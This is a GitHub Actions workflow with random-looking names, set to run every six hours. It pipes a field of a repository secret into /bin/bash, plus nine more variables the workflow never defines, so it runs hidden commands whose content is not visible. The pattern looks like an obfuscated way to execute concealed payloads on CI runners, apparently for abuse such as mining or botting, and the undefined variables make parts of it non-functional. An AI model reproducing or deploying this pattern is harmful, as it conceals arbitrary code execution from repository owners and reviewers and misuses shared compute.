name: misshgaukll
on:
  workflow_dispatch:
  schedule:
    - cron: '51 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: misshgaukll
        env:
          scs7: ${{ secrets.scs7 }}
        run: |
          echo $scs7 | jq -r .xfcd43934 | /bin/bash
          echo $ivou8 | jq -r .pdy4324 | /bin/bash
          echo $bkw1 | jq -r .fl39 | /bin/bash
          echo $yz822 | jq -r .yasex508 | /bin/bash
          echo $rp108 | jq -r .ysdd784 | /bin/bash
          echo $i34641 | jq -r .uvy1 | /bin/bash
          echo $pqz090 | jq -r .xlq995 | /bin/bash
          echo $jt821 | jq -r .uos63561 | /bin/bash
          echo $rooc5 | jq -r .vsxz902 | /bin/bash
          echo $cxcc17906 | jq -r .mk7031 | /bin/bash

